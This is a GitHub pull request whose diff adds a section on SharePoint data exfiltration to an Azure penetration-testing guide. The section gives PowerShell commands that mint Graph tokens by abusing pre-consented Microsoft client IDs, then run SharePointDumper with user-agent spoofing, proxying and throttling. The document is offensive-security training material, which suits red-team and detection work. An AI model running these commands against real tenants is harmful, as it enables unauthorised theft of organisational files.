Skip to content

SharePointDumper #251

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
carlospolop wants to merge 1 commit into
base: master
Choose a base branch
from
Open

SharePointDumper #251

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
59 changes: 59 additions & 0 deletions src/pentesting-cloud/azure-security/az-services/az-azuread.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -1176,6 +1176,63 @@ Get-AzureADMSScopedRoleMembership -Id <id> | fl #Get role ID and role members
{{#endtab }}
{{#endtabs }}

## Microsoft Graph delegated SharePoint data exfiltration (SharePointDumper)

Attackers with a **delegated Microsoft Graph token** that includes **`Sites.Read.All`** or **`Sites.ReadWrite.All`** can enumerate **sites/drives/items** over Graph and then **pull file contents** via **SharePoint pre-authentication download URLs** (time-limited URLs embedding an access token). The [SharePointDumper](https://github.com/zh54321/SharePointDumper) script automates the full flow (enumeration → pre-auth downloads) and emits per-request telemetry for detection testing.

### Obtaining usable delegated tokens

- SharePointDumper itself **does not authenticate**; supply an access token (optionally refresh token).
- Pre-consented **first-party clients** can be abused to mint a Graph token without registering an app. Example `Invoke-Auth` (from [EntraTokenAid](https://github.com/zh54321/EntraTokenAid)) invocations:

```powershell
# CAE requested by default; yields long-lived (~24h) access token
Import-Module ./EntraTokenAid/EntraTokenAid.psm1
$tokens = Invoke-Auth -ClientID 'b26aadf8-566f-4478-926f-589f601d9c74' -RedirectUrl 'urn:ietf:wg:oauth:2.0:oob' # OneDrive (FOCI TRUE)

# Other pre-consented clients
Invoke-Auth -ClientID '1fec8e78-bce4-4aaf-ab1b-5451cc387264' -RedirectUrl 'https://login.microsoftonline.com/common/oauth2/nativeclient' # Teams (FOCI TRUE)
Invoke-Auth -ClientID 'd326c1ce-6cc6-4de2-bebc-4591e5e13ef0' -RedirectUrl 'msauth://code/ms-sharepoint-auth%3A%2F%2Fcom.microsoft.sharepoint' # SharePoint (FOCI TRUE)
Invoke-Auth -ClientID '4765445b-32c6-49b0-83e6-1d93765276ca' -RedirectUrl 'https://scuprodprv.www.microsoft365.com/spalanding' -Origin 'https://doesnotmatter' # OfficeHome (FOCI FALSE)
Invoke-Auth -ClientID '08e18876-6177-487e-b8b5-cf950c1e598c' -RedirectUrl 'https://onedrive.cloud.microsoft/_forms/spfxsinglesignon.aspx' -Origin 'https://doesnotmatter' # SPO Web Extensibility (FOCI FALSE)
```

> [!NOTE]
> FOCI TRUE clients support refresh across devices; FOCI FALSE clients often require `-Origin` to satisfy reply URL origin validation.

### Running SharePointDumper for enumeration + exfiltration

- Basic dump with custom UA / proxy / throttling:

```powershell
.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -UserAgent "Not SharePointDumper" -RequestDelaySeconds 2 -Variation 3 -Proxy 'http://127.0.0.1:8080'
```

- Scope control: include/exclude sites or extensions and global caps:

```powershell
.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -IncludeSites 'Finance','Projects' -IncludeExtensions pdf,docx -MaxFiles 500 -MaxTotalSizeMB 100
```

- **Resume** interrupted runs (re-enumerates but skips downloaded items):

```powershell
.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -Resume -OutputFolder .\20251121_1551_MyTenant
```

- **Automatic token refresh on HTTP 401** (requires EntraTokenAid loaded):

```powershell
Import-Module ./EntraTokenAid/EntraTokenAid.psm1
.\Invoke-SharePointDumper.ps1 -AccessToken $tokens.access_token -RefreshToken $tokens.refresh_token -RefreshClientId 'b26aadf8-566f-4478-926f-589f601d9c74'
```

Operational notes:

- Prefers **CAE-enabled** tokens to avoid mid-run expiry; refresh attempts are **not** logged in the tool’s API log.
- Generates **CSV/JSON request logs** for **Graph + SharePoint** and redacts embedded SharePoint download tokens by default (toggleable).
- Supports **custom User-Agent**, **HTTP proxy**, **per-request delay + jitter**, and **Ctrl+C-safe shutdown** for traffic shaping during detection/IR tests.

## Entra ID Privilege Escalation

{{#ref}}
Expand Down Expand Up @@ -1245,6 +1302,8 @@ The default mode is **Audit**:
## References

- [https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units](https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units)
- [SharePointDumper](https://github.com/zh54321/SharePointDumper)
- [EntraTokenAid](https://github.com/zh54321/EntraTokenAid)

{{#include ../../../banners/hacktricks-training.md}}

Expand Down